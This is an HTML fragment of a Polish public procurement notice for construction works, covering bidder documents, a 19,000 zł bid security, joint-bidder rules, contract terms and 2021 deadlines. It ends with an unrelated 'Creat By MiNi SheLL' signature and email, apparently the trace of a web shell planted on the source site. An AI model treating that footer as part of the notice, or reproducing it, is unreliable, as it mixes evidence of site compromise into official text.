brak podstaw wykluczenia,<br/>spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący<br/>wymagane przez Zamawiającego podmiotowe środki dowodowe. Oświadczenie składa się, pod<br/>rygorem nieważności, w formie elektronicznej (tj. w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzone podpisem<br/>zaufanym lub podpisem osobistym.<br/>1.1 W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o<br/>którym mowa w pkt 1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie<br/>(Zał. nr 2a do SWZ).<br/>Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu;<br/>1.2. W przypadku polegania przez wykonawcę na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, Wykonawca przedstawia wraz z oświadczeniem własnym, o którym<br/>mowa w pkt 1 także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak<br/>podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim Wykonawca powołuje się na jego zasoby (Zał. nr 2b do SWZ).<br/>2. Zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy<br/>niezbędnych zasobów na potrzeby realizacji zamówienia, którego-Zał. nr 3 do SWZ lub inny<br/>podmiotowy środek dowodowy, potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów wymagane postanowieniami rozdz. XIII<br/>SWZ, w przypadku, gdy Wykonawca polega na zdolnościach podmiotów udostępniających<br/>zasoby w celu potwierdzenia spełniania warunków udziału w postępowaniu (o ile dotyczy).<br/>3. Oświadczenie, o którym mowa w art. 117 ust. 4 Pzp, z którego wynika, które roboty<br/>budowlane wykonają poszczególni Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia (o ile dotyczy); wzór oświadczenia stanowi Zał. nr 4 do SWZ; <br/>4. Oświadczenia i/lub dokumenty, na podstawie których Zamawiający dokona oceny<br/>skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę<br/>przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji (jeżeli<br/>Wykonawca zastrzega takie informacje).<br/>5. Dowód wniesienia wadium – zgodnie z opisem w rozdz. XVI SWZ.<br/>6. Dokumenty, z których wynika umocowanie osób do reprezentowania Wykonawcy, w<br/>szczególności:<br/>6.1. Odpis lub informację z KRS, CEiDG lub innego właściwego rejestru albo wskazać dane<br/>umożliwiające dostęp do tych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych;<br/>6.2. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów określonych w pkt 6.1.;<br/>6.3. Przepis pkt 6.2. stosuje się odpowiednio do osoby działającej w imieniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia publicznego;<br/>6.4. Przepisy pkt 6.1. – 6.2. stosuje się odpowiednio do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 Pzp;<br/>6.5. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia - pełnomocnictwo do reprezentowania tych Wykonawców lub inny dokument (np.<br/>umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo). Pełnomocnik<br/>Wykonawców występujących wspólnie może być ustanowiony do reprezentowania<br/>Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do wniesienia wadium w kwocie: 19 000,00 zł (słownie:<br/>dziewiętnaście tysięcy złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2<br/>i 3 Pzp oraz art. 98 ust. 2 Pzp.<br/>3. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>3.1. pieniądzu,<br/>3.2. gwarancjach bankowych,<br/>3.3. gwarancjach ubezpieczeniowych,<br/>3.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4. Szczegółowe informacje dotyczące wadium określono w rozdz. XVI SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (członkowie<br/>konsorcjum, wspólnicy spółki cywilnej), zgodnie z art. 58 Pzp, Wykonawcy ustanowią<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Zgodnie z art. 445 Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą<br/>solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego<br/>wykonania umowy.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>4.1. żaden z nich nie może podlegać wykluczeniu z postępowania o udzielenie zamówienia<br/>publicznego w okolicznościach, o których mowa w rozdz. IX SWZ, natomiast spełnianie<br/>warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z wymogami zawartymi w<br/>rozdz. X SWZ;<br/>Oświadczenie, o którym mowa w rozdz. XI pkt 1.2. SWZ składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie.<br/>4.2. w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane; W takim przypadku, Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, o którym mowa w rozdz. XI pkt 1.4. SWZ, z<br/>którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>5. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, w przypadku wybrania ich<br/>oferty, przed zawarciem umowy w sprawie zamówienia publicznego zobowiązani są do<br/>przedłożenia kopii umowy regulującej ich współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Istotne dla stron postanowienia zawarte są we wzorze umowy, który stanowi Załączniki nr 7<br/>do SWZ.<br/>2. Dopuszczalne zmiany postanowień umowy określa § 62 ww. wzoru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-27 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-27 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie przewiduje złożenia oferty w postaci katalogów elektronicznych.<br/>2. Zamawiający nie przewiduje zastosowania aukcji elektronicznej.<br/>3. Zamawiający nie prowadzi postępowania w celu zawarcia umowy ramowej.<br/>4. Rozliczenia miedzy Zamawiającym a Wykonawcą dokonywane będą w walucie polskiej w<br/>złotych (PLN).<br/>5. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>6. Do obowiązków Wykonawcy należą m.in. obowiązki wynikające z RODO, w szczególności<br/>obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane<br/>osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał. Jednakże obowiązek<br/>informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim<br/>osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (vide: art. 13 ust. 4 RODO). <br/>Ponadto Wykonawca będzie musiał wypełnić obowiązek informacyjny wynikający z art.<br/>14 RODO względem osób fizycznych, których dane przekazuje Zamawiającemu i których dane<br/>pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa<br/>w art. 14 ust. 5 RODO.

Creat By MiNi SheLL
Email: jattceo@gmail.com